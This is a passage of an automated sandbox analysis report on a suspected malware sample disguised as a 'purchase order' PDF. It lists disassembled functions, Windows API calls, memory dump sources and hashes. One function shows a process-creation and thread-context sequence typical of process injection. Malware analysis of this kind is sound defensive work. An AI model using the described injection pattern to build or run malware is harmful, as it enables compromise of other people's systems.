Opcode ID: 20c0c141ed065fd8f1401868c14332e93308b4b186cc467e19d89aa8905e8c61
Instruction ID: 5274c6a70c528a4429b2aed13576973a92c669e4c304a0138fbb1be98cd8ed9f
Opcode Fuzzy Hash: 20c0c141ed065fd8f1401868c14332e93308b4b186cc467e19d89aa8905e8c61
Instruction Fuzzy Hash: 0AF14571A083419FC714DF29C480A6ABBE5FF89314F14892EF899DB252D771E945CF82

Function 0087F8CF Relevance: 4.7, APIs: 3, Instructions: 168comCOMMON

Download Yara Rule

APIs

Part of subcall function 008903A2: MapVirtualKeyW.USER32(0000005B,00000000), ref: 008903D3
Part of subcall function 008903A2: MapVirtualKeyW.USER32(00000010,00000000), ref: 008903DB
Part of subcall function 008903A2: MapVirtualKeyW.USER32(000000A0,00000000), ref: 008903E6
Part of subcall function 008903A2: MapVirtualKeyW.USER32(000000A1,00000000), ref: 008903F1
Part of subcall function 008903A2: MapVirtualKeyW.USER32(00000011,00000000), ref: 008903F9
Part of subcall function 008903A2: MapVirtualKeyW.USER32(00000012,00000000), ref: 00890401

Part of subcall function 00886259: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,0087FA90), ref: 008862B4

GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 0087FB2D
OleInitialize.OLE32(00000000), ref: 0087FBAA
CloseHandle.KERNEL32(00000000), ref: 008B49F2

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
String ID:
API String ID: 1986988660-0
Opcode ID: a18208012026b7ee51674ffaf6d6ae82f84cd546e3780345d82a4c8b5d3c8e86
Instruction ID: 067b48df3f41f6e97dffeb738c1be60ff2e04df3c539543e4a8a5af3e8ebc54f
Opcode Fuzzy Hash: a18208012026b7ee51674ffaf6d6ae82f84cd546e3780345d82a4c8b5d3c8e86
Instruction Fuzzy Hash: C08199B0D29340AEC794EF3AE9496657BE5FB9A308710C13AE159C7276EB318404EF61

Function 008743DB Relevance: 4.6, APIs: 3, Instructions: 77windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00874401
Shell_NotifyIconW.SHELL32(00000000,?), ref: 008744A6
Shell_NotifyIconW.SHELL32(00000001,?), ref: 008744C3

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID: IconNotifyShell_$_memset
String ID:
API String ID: 1505330794-0
Opcode ID: cbe9acb7e8d9e411859c5d271e18c5b8f4bd24e4ad4a57e2d277ad22de85e487
Instruction ID: ee619259b30c88f467e4863251da554875392c0f7c25a31d08c69020f0527b59
Opcode Fuzzy Hash: cbe9acb7e8d9e411859c5d271e18c5b8f4bd24e4ad4a57e2d277ad22de85e487
Instruction Fuzzy Hash: 10315EB05097019FD720DF24D884AABBBF8FB49308F00492EE69ED3251D775A948DB96

Function 0089594C Relevance: 4.6, APIs: 3, Instructions: 59memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

__FF_MSGBANNER.LIBCMT ref: 00895963

Part of subcall function 0089A3AB: __NMSG_WRITE.LIBCMT ref: 0089A3D2
Part of subcall function 0089A3AB: __NMSG_WRITE.LIBCMT ref: 0089A3DC

__NMSG_WRITE.LIBCMT ref: 0089596A

Part of subcall function 0089A408: GetModuleFileNameW.KERNEL32(00000000,009343BA,00000104,?,00000001,00000000), ref: 0089A49A
Part of subcall function 0089A408: ___crtMessageBoxW.LIBCMT ref: 0089A548

Part of subcall function 008932DF: ___crtCorExitProcess.LIBCMT ref: 008932E5
Part of subcall function 008932DF: ExitProcess.KERNEL32 ref: 008932EE

Part of subcall function 00898D68: __getptd_noexit.LIBCMT ref: 00898D68

RtlAllocateHeap.NTDLL(01210000,00000000,00000001,00000000,?,?,?,00891013,?), ref: 0089598F

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
String ID:
API String ID: 1372826849-0
Opcode ID: 30e0ecfa593ef74db919f811b940031a0ae8010530c0b350e2fbb2a38e78e22b
Instruction ID: e495e4e6f331ec47b0b4e050a4569a1382e180f7bd0818bbf5909c2a30c29d0e
Opcode Fuzzy Hash: 30e0ecfa593ef74db919f811b940031a0ae8010530c0b350e2fbb2a38e78e22b
Instruction Fuzzy Hash: A0019231205A16EEFE263B68FC52B6E7648FF42774F1D002AF505EB281DA709D019766

Function 008D9B2C Relevance: 4.5, APIs: 3, Instructions: 24filetimeCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,008D97D2,?,?,?,?,?,00000004), ref: 008D9B45
SetFileTime.KERNELBASE(00000000,?,00000000,?,?,008D97D2,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 008D9B5B
CloseHandle.KERNEL32(00000000,?,008D97D2,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 008D9B62

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID: File$CloseCreateHandleTime
String ID:
API String ID: 3397143404-0
Opcode ID: a25063378aad62a38a52a81ff965a1c16af74aea5288ba639904a305b0de470e
Instruction ID: c62b352ef3a56dcd0abbdf69fa07319f9a4580bf7857b7b2948d15fcdf584d42
Opcode Fuzzy Hash: a25063378aad62a38a52a81ff965a1c16af74aea5288ba639904a305b0de470e
Instruction Fuzzy Hash: 22E08632180224B7D7221B64EC09FDE7B18FF05771F144221FB54A91E187B12561D798

Function 008D8F97 Relevance: 4.5, APIs: 3, Instructions: 22COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 008D8FA5

Part of subcall function 00892F95: RtlFreeHeap.NTDLL(00000000,00000000,?,00899C64), ref: 00892FA9
Part of subcall function 00892F95: GetLastError.KERNEL32(00000000,?,00899C64), ref: 00892FBB

_free.LIBCMT ref: 008D8FB6
_free.LIBCMT ref: 008D8FC8

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 7d3b2028e624efae88516297b2f19128b0b5a47fb3bf7ffb404a5919715f4e12
Instruction ID: 87eaef37dce92d78923b4ef2a01715e524d9db481e91ceae777b89d048459f93
Opcode Fuzzy Hash: 7d3b2028e624efae88516297b2f19128b0b5a47fb3bf7ffb404a5919715f4e12
Instruction Fuzzy Hash: 13E012A1609701AACE34B77DAD40A9367EEFF48350B1C091EB409DB242DE24F8418124

Function 0087AB23 Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 534COMMON

Download Yara Rule

Strings

CALL, xrefs: 008B002B

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID:
String ID: CALL
API String ID: 0-4196123274
Opcode ID: 4fc4af42ad2eb6818404b9371f4f45b8c723952b21e68cf5fd1d28210724f293
Instruction ID: 52920dafab0e9dcc7175a1eba44865c3f37c272a51f2bd45f67fde7540309ed1
Opcode Fuzzy Hash: 4fc4af42ad2eb6818404b9371f4f45b8c723952b21e68cf5fd1d28210724f293
Instruction Fuzzy Hash: F62216705082459FCB28DF18C494B6ABBE1FF85304F14895DE89ACB366D731ED85DB82

Function 00874DD0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 141COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00874E1A

Strings

EA06, xrefs: 008ADCF5

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID: _memmove
String ID: EA06
API String ID: 4104443479-3962188686
Opcode ID: 1ec85bf63660656bacc27b73df44938b638ef8c6e4810702e2fb2015d0e50d04
Instruction ID: df640bdd81aa40dc24d2bf6d83378a52beb2bc3d82ac8262c8edbd32ca36622d
Opcode Fuzzy Hash: 1ec85bf63660656bacc27b73df44938b638ef8c6e4810702e2fb2015d0e50d04
Instruction Fuzzy Hash: FD419033A045589BDF115B6888917BE7FA5FB02334F58E065FC8AD728EC761CD8083A2

Function 0087492E Relevance: 3.1, APIs: 2, Instructions: 59COMMON

Download Yara Rule

APIs

IsThemeActive.UXTHEME ref: 00874992

Part of subcall function 008935AC: __lock.LIBCMT ref: 008935B2
Part of subcall function 008935AC: DecodePointer.KERNEL32(00000001,?,008749A7,008C81BC), ref: 008935BE
Part of subcall function 008935AC: EncodePointer.KERNEL32(?,?,008749A7,008C81BC), ref: 008935C9

Part of subcall function 00874A5B: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00874A73
Part of subcall function 00874A5B: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00874A88

Part of subcall function 00873B4C: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00873B7A
Part of subcall function 00873B4C: IsDebuggerPresent.KERNEL32 ref: 00873B8C
Part of subcall function 00873B4C: GetFullPathNameW.KERNEL32(00007FFF,?,?,009362F8,009362E0,?,?), ref: 00873BFD
Part of subcall function 00873B4C: SetCurrentDirectoryW.KERNEL32(?), ref: 00873C81

SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 008749D2

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID: InfoParametersSystem$CurrentDirectoryPointer$ActiveDebuggerDecodeEncodeFullNamePathPresentTheme__lock
String ID:
API String ID: 1438897964-0
Opcode ID: 7e115b3d3d3a9d5718933c06dfd720f2b4f0f4d327c24dc14d50ef1c2dccb7d5
Instruction ID: cf51388b0dec811878f5be71240b8a95ce1b55e86e8656c7681ed39ea1769e6b
Opcode Fuzzy Hash: 7e115b3d3d3a9d5718933c06dfd720f2b4f0f4d327c24dc14d50ef1c2dccb7d5
Instruction Fuzzy Hash: 62115871928311ABC700EF69D84591AFBF8FB99710F00852AF499C32B2DB70D544DB92

Function 00875DF9 Relevance: 3.1, APIs: 2, Instructions: 57fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000,?,00875981,?,?,?,?), ref: 00875E27
CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,00000000,?,00875981,?,?,?,?), ref: 008AE19C

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: c852191a8915ac368a70690f1b9744510d9a1f3bf06ef832cba52a8f1cd26a31
Instruction ID: 13df9e108ae6cc4f0944066ba04b7b5d71a7ae0aa6a2d3c674be5eaf0b7eb3d1
Opcode Fuzzy Hash: c852191a8915ac368a70690f1b9744510d9a1f3bf06ef832cba52a8f1cd26a31
Instruction Fuzzy Hash: F6015271244708BEF7250E24CC8AF763B9CFB05768F10C719BAE99A1E0C6F45E958B50

Function 00890FF6 Relevance: 3.0, APIs: 2, Instructions: 44COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0089594C: __FF_MSGBANNER.LIBCMT ref: 00895963
Part of subcall function 0089594C: __NMSG_WRITE.LIBCMT ref: 0089596A
Part of subcall function 0089594C: RtlAllocateHeap.NTDLL(01210000,00000000,00000001,00000000,?,?,?,00891013,?), ref: 0089598F

std::exception::exception.LIBCMT ref: 0089102C
__CxxThrowException@8.LIBCMT ref: 00891041

Part of subcall function 008987DB: RaiseException.KERNEL32(?,?,?,0092BAF8,00000000,?,?,?,?,00891046,?,0092BAF8,?,00000001), ref: 00898830

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
String ID:
API String ID: 3902256705-0
Opcode ID: 5e81bedf92f43d294b14ba59208a7e95281a5c7fa15cb39582a40ba8b9b058e5
Instruction ID: 5598a29c8588d8cbf6d7cb927b21047b7c67569971929722f64a65042522ffb5
Opcode Fuzzy Hash: 5e81bedf92f43d294b14ba59208a7e95281a5c7fa15cb39582a40ba8b9b058e5
Instruction Fuzzy Hash: 99F0813550871AAACF21BB98EC099DE7BE8FF01350F180425F904D65D1DFB29A809692

Function 0089582D Relevance: 3.0, APIs: 2, Instructions: 42COMMONLIBRARYCODE

Download Yara Rule

APIs

_memset.LIBCMT ref: 0089585C
__lock_file.LIBCMT ref: 0089587D

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID: __lock_file_memset
String ID:
API String ID: 26237723-0
Opcode ID: 587a6e1fe9df03c1ea0cc2517b6c7ca7a691d4575cfef1305841b3b9d5719edf
Instruction ID: 2fa0603742f4ffa38cda72525c8d900a90b9af3a738c234b4e9de055f208d837
Opcode Fuzzy Hash: 587a6e1fe9df03c1ea0cc2517b6c7ca7a691d4575cfef1305841b3b9d5719edf
Instruction Fuzzy Hash: 3D014471801A09EBCF13BF6D9C0559F7B61FF81760F1C8225B824EB1A1DB318A21DB92

Function 008955D6 Relevance: 3.0, APIs: 2, Instructions: 33COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00898D68: __getptd_noexit.LIBCMT ref: 00898D68

__lock_file.LIBCMT ref: 0089561B

Part of subcall function 00896E4E: __lock.LIBCMT ref: 00896E71

__fclose_nolock.LIBCMT ref: 00895626

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID: __fclose_nolock__getptd_noexit__lock__lock_file
String ID:
API String ID: 2800547568-0
Opcode ID: f3c83702f103b2829454ae61f918d34f1f821fd26ad05ce5eec4fd7a9fde84cf
Instruction ID: 9d1330fa28312f03e3268e1669b4bff8a1d59bd4936707dda79429f6108853ea
Opcode Fuzzy Hash: f3c83702f103b2829454ae61f918d34f1f821fd26ad05ce5eec4fd7a9fde84cf
Instruction Fuzzy Hash: 3BF0CD31900A05DADF22BB7D880276E6BA0FF52338F6D8209B415EB0C1CF788A018B42

Function 0364129D Relevance: 1.9, APIs: 1, Instructions: 400processthreadCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE(?,00000000), ref: 03641A5B
Wow64GetThreadContext.KERNEL32(?,00010007), ref: 03641AF1
ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 03641B13

Memory Dump Source

Source File: 00000000.00000002.1654328107.0000000003640000.00000040.00001000.00020000.00000000.sdmp, Offset: 03640000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3640000_purchase order_pdf.jbxd

Similarity

API ID: Process$ContextCreateMemoryReadThreadWow64
String ID:
API String ID: 2438371351-0
Opcode ID: 282d440d23347d33a5333bc70feb3b77e7ffa06fe9f8fdc76eda24defaf3804a
Instruction ID: 17634881c72f8d4df2c865b64f8a5bde1cddd12cdd0d694c0f8dd3668504e954
Opcode Fuzzy Hash: 282d440d23347d33a5333bc70feb3b77e7ffa06fe9f8fdc76eda24defaf3804a
Instruction Fuzzy Hash: E712BD24E24658C6EB24DF64D8507DEB232EF69300F1090E9D10DEB7A5E77A4E81CF5A

Function 00882123 Relevance: 1.7, APIs: 1, Instructions: 171COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8549cd7c01ed3895aebaaf954f7dfd2b473148240e7b867d73285d6488ff5d1e
Instruction ID: d798e0568ab2bd7fe0ca98b97e23004c083952c5080a64f57585697282b45a87
Opcode Fuzzy Hash: 8549cd7c01ed3895aebaaf954f7dfd2b473148240e7b867d73285d6488ff5d1e
Instruction Fuzzy Hash: 12518E35600614AFCF14EB68C995FAE77A6FF85310F148068F94AEB386DB34ED008B42

Function 00875C4E Relevance: 1.6, APIs: 1, Instructions: 97COMMON

Download Yara Rule

APIs

SetFilePointerEx.KERNELBASE(?,?,00000001,00000000,00000000,?,?,00000000), ref: 00875CF6

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: 7ae317a425831c1263d529b4ae0be8a2fd1e26ed8301bf39358c8e1451b4894c
Instruction ID: 32bf32a3868d67ea203d78b932d2edd94d70a85780ad548e0ebe195dfc246d38
Opcode Fuzzy Hash: 7ae317a425831c1263d529b4ae0be8a2fd1e26ed8301bf39358c8e1451b4894c
Instruction Fuzzy Hash: 4B312871A00B19ABCB18DF2DC484A6DB7B5FF88310F15C629E819D3718D7B1E960DB91

Function 008B00D6 Relevance: 1.6, APIs: 1, Instructions: 88COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 008B00E1

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID: ClearVariant
String ID:
API String ID: 1473721057-0
Opcode ID: 62e8fc5a87656affc4f40cd0694a3999bbb205950113d2cde38bbb941e63d900
Instruction ID: 75dd392662a612d1a7abcc2ea7a9e7c04228ba24d068ad61e88eede786e9bc2e
Opcode Fuzzy Hash: 62e8fc5a87656affc4f40cd0694a3999bbb205950113d2cde38bbb941e63d900
Instruction Fuzzy Hash: EB41F574508341CFDB24DF18C484B2ABBE1FF85318F19899CE99A8B362D332E845CB52

Function 00875B19 Relevance: 1.6, APIs: 1, Instructions: 72COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00875B61

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: 67957f59d38bc25f787a5876e2daf7debdec046b82c525372b383391ec4489e3
Instruction ID: 657d0dead9b9a62eab95c9f47a22dad67e1cc66d3da4a6435be1718e6c2a39e2
Opcode Fuzzy Hash: 67957f59d38bc25f787a5876e2daf7debdec046b82c525372b383391ec4489e3
Instruction Fuzzy Hash: 3B212430A14A0DEBEF205F55E88467A7FF8FF11350F25C86AE489C1814EBB194E0DB42

Function 00873F84 Relevance: 1.6, APIs: 1, Instructions: 68COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 0087400E

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID: _memmove
String ID:
API String ID: 4104443479-0
Opcode ID: 1a6e7557a06088e9f728cfb8a6d49882bb5033497bcac9d854a8c8369196d820
Instruction ID: f57ee95b4d8fa3809d19e7e41944101cdeed14f6ee156f224df25265bfd56b6d
Opcode Fuzzy Hash: 1a6e7557a06088e9f728cfb8a6d49882bb5033497bcac9d854a8c8369196d820
